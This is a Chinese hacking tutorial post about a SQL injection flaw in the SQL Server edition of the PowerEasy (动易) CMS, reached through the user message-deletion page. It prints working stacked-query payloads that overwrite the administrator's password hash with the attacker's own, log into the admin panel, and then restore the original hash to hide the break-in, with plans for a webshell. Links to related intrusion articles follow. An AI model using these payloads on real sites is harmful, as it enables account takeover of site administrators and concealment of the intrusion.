动易SQL版新洞利用短信功能直接拿后台

所属分类: 实用技巧 / 漏洞研究 阅读数: 1794
收藏 0 赞 0 分享
先注册个号,进入控制面版给自己发条短信  

http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4  
这就是点```  
用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为  
=没有登陆````ef0020cf8c5e45b9 密码是这个```  
下面就开始将管理员的密码更新为我注册用户的密码````  
利用动易爆库改库程序先将pe_admin里adminname,password字段爆出来.....  
);update pe_admin set password=(select userpassword from pe_user 
 where username=char(0x68)%2Bchar(0x61)%2Bchar(0x63)%2Bchar(0x6b) 
%2Bchar(0x35)%2Bchar(0x32)%2Bchar(0x30)) where id=1;--  
这语句的意思就是将PE——ADMIN表中ID=1的用户的密码更新为PE_USER表中 user的密码```好``现在来看```需要将hack520转char  
更新成功`~~~~现在已经将PE_admin表ID=1的用户的密码更新为hack520的密码````再看一下```  
53dc3b60f2d40cd4这个是我前面注册的密码```好现在登陆后台看看  
您的用户名:admin   
您的身份:超级管理员   
待阅短信: 1 条   
成功````然后为自己加个管理员`然后利用以下语句`将管理员的密码更新回来  
user  
就是注册的用户名````````时间不多```进得了后台就不管其他的先了````拿WEBSHELL以后再说```  
刚刚时间到了,现在继续。。。将管理员密码改回来.  
);declare @a sysname select @a=0x650066003000300032003000630066 
0038006300350065003400350062003900 update pe_admin set passwo 
rd=@a--  这个要转一下  

更新```把管理员密码改回来  OK我们再看看修改成功没```ef0020cf8c5e45b9这个是原来的密码吧?  
好了就到此结束! 
更多精彩内容其他人还在看

为动网论坛添加一个密码嗅探器(DVBBS)

为动网论坛添加一个密码嗅探器(DVBBS)
收藏 0 赞 0 分享

黑客攻击揭密--分析选定的网络攻击

黑客攻击揭密--分析选定的网络攻击
收藏 0 赞 0 分享

2005年黑客聚焦:追踪垃圾邮件(图)

2005年黑客聚焦:追踪垃圾邮件(图)
收藏 0 赞 0 分享

剖析网站遭遇的黑客的三次入侵

剖析网站遭遇的黑客的三次入侵
收藏 0 赞 0 分享

域名劫持---163.net被黑的分析

域名劫持---163.net被黑的分析
收藏 0 赞 0 分享

悬念音乐程序安装程序写马(图)

悬念音乐程序安装程序写马(图)
收藏 0 赞 0 分享

为什么经常被网络入侵?探究原因

为什么经常被网络入侵?探究原因
收藏 0 赞 0 分享

黑客之门的魅力:感染与加载(图)

黑客之门的魅力:感染与加载(图)
收藏 0 赞 0 分享

诱人视频请君入瓮 解析RealPlayer溢出漏洞

诱人视频请君入瓮 解析RealPlayer溢出漏洞
收藏 0 赞 0 分享

漏洞漫舞的飞骋

漏洞漫舞的飞骋
收藏 0 赞 0 分享
查看更多